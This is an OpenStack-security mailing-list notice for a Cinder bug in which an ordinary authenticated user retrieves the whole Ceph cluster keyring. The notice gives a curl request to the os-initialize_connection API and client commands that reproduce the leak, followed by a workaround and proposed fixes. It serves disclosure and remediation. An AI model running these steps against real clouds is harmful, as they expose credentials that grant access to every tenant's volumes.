[Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak
Brian Rosmaita
rosmaita.fossdev at gmail.com
Thu Oct 31 13:39:13 UTC 2019
A note about step 2 in the Quick Workaround in the bug description:
Gorka Eguileor noticed that the correct file location is actually:
/etc/ceph/<cluster_name>.client.<user_name>.keyring
See https://opendev.org/openstack/os-
brick/src/commit/87171abef8bf2336f15ce3a7949f77d7999e11b7/os_brick/initiator/connectors/rbd.py#L76
--
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1849624
Title:
ceph backend, secret key leak
Status in Cinder:
In Progress
Status in OpenStack Security Advisory:
Won't Fix
Status in OpenStack Security Notes:
Confirmed
Bug description:
Cinder + ceph backend, secret key leak
Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder
config files
As an authenticated simple user create a cinder volume that ends up on a ceph backend,
Then reuse the os.initialize_connection api call
(used by nova-compute/cinder-backup to attach volumes locally to the host running the services):
curl -g -i -X POST https://<cinder_controller>/v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-H "OpenStack-API-Version: volume 3.15" \
-H "X-Auth-Token: $TOKEN" \
-d '{"os-initialize_connection": {"connector":{}}}'
If you do not want to forge the http request, openstack clients and
extensions may prove helpful.
As root:
apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common
virtualenv -p python3 venv_openstack
source venv_openstack/bin/activate
pip install python-openstackclient
pip install python-cinderclient
pip install os-brick
pip install python-brick-cinderclient-ext
cinder create vol 1
cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879
This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access
to all the volumes within the cluster.
{
"connection_info" : {
"data" : {
"access_mode" : "rw",
"secret_uuid" : "SECRET_UUID",
"cluster_name" : "ceph",
"encrypted" : false,
"auth_enabled" : true,
"discard" : true,
"qos_specs" : {
"write_iops_sec" : "3050",
"read_iops_sec" : "3050"
},
"keyring" : "SECRETFILETOHIDE",
"ports" : [
"6789",
"6789",
"6789"
],
"name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",
"secret_type" : "ceph",
"hosts" : [
"ceph_host1",
"ceph_host2",
...
],
"volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",
"auth_username" : "cinder"
},
"driver_volume_type" : "rbd"
}
}
Quick workaround:
1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure.
2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts
(/etc/cinder/<backend_name>.keyring.conf, to be confirmed).
Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in
libvirt secrets already, thus making this keyring disclose useless to it.
(to be confirmed, there may be other compute drivers that might be impacted by this)
Quick code fix:
Mandatory: revert this commit https://review.opendev.org/#/c/456672/
Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted
Long term code fix proposals:
What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service
in order to attach volumes outside the scope of any virtual machines/nova.
Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose
anything that would allow him to do more than that.
Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster),
the related cinder backend for ceph should not implement this route at all
There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids,
if the attach is doomed to fail for users missing secret informations anyway.
Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to:
- check caller rw permissions on requested volumes
- escalate the request
- go through a new admin api route, not this 'user' one
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions
More information about the Openstack-security
mailing list